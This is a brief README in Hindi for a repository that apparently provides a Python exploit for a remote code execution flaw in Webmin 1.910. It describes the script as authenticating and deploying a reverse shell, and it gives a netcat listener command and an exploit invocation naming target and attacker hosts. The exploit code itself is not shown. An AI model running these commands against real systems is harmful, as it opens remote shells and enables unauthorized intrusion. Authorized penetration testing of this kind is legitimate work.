
Webmin 1.910 रिमोट कोड निष्पादन शोषण
Webmin 1.910 रिमोट कोड एक्ज़ीक्यूशन एक्सप्लॉइट
इस रिपॉज़िटरी में एक Python 3 स्क्रिप्ट है जो Webmin संस्करण 1.910 में रिमोट कोड एक्ज़ीक्यूशन भेद्यता का शोषण करने के लिए डिज़ाइन की गई है। स्क्रिप्ट प्रमाणीकरण करने और रिवर्स शेल पेलोड तैनात करने के लिए session_login.cgi एंडपॉइंट का उपयोग करती है, जिससे लक्षित सिस्टम तक रिमोट एक्सेस मिलता है। यह एक्सप्लॉइट अधिकृत पेनेट्रेशन टेस्टिंग और शैक्षिक उद्देश्यों के लिए है।
nc -lvnp <lport>
python3 webmin_exploit.py --rhost <target_ip> --lhost <your_ip> --lport <your_port> -u <username> -p <password>

